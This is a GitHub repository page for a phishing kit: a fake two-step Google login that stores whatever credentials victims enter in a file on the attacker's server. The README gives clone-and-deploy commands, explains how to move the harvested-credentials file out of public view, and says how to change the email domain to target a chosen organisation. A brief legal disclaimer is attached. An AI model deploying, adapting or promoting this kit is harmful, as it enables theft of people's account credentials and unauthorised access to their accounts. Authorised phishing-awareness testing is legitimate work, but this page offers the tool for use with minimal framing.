Skip to content

jakedmurphy1/GooglePhishing

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

GooglePhishing

This repo contains a fake two-part Google Login. It can be used on a web server that supports PHP files. Any entered credentials are saved in /opt/GooglePhishing/creds.txt. The Domain Suffix can be changed from @client.com to any site of your choosing (to do this, just edit line 21 of index.html). Follow steps below for a quick and easy setup.

Email Page Password Page

Legal Disclaimer: Usage of this repo for attacking targets without prior consent is illegal. It is the end user's responsiblity to obey applicable local, state and federal laws. Developer assumes no liability for any misuse or damage caused by this repo.

Get Started

Run the below commands in the /var/www/html folder of your web server.

git clone https://github.com/jakedmurphy1/GooglePhishing.git
cd GooglePhishing
chmod 666 creds.txt

Move the credentials file into a non-public folder:

mkdir /opt/GooglePhishing && mv creds.txt /opt/GooglePhishing/creds.txt

Then visit /GooglePhishing/index.html in your browser and give it a try! Any gathered credentials will be stored in /opt/GooglePhishing/creds.txt

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages